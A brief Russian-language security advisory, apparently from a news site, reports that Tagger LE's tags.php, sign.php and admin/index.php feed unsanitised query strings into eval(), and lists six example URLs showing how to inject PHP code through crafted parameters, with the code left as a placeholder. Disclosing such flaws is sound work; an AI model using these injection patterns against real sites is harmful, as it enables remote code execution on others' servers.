Программа: Tagger LE

Злоумышленник может скомпрометировать уязвимую систему. Сценарии tags.php, sign.php, и admin/index.php не санируют строку запроса перед ее использованием в "eval()". В результате можно внедрить и выполнить произвольный PHP код, используя специально сформированные параметры.

Пример:

http://[host]/tags.php?foo=%22.[code].%22
http://[host]/sign.php?foo=%22.[code].%22
http://[host]/admin/index.php?foo=%22.[code].%22
http://[host]/taggerLE/tags.php?foo;[code];$foo=foo
http://[host]/taggerLE/sign.php?foo;[code];$foo=foo
http://[host]/admin/index.php?foo;[code];$foo=foo
 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии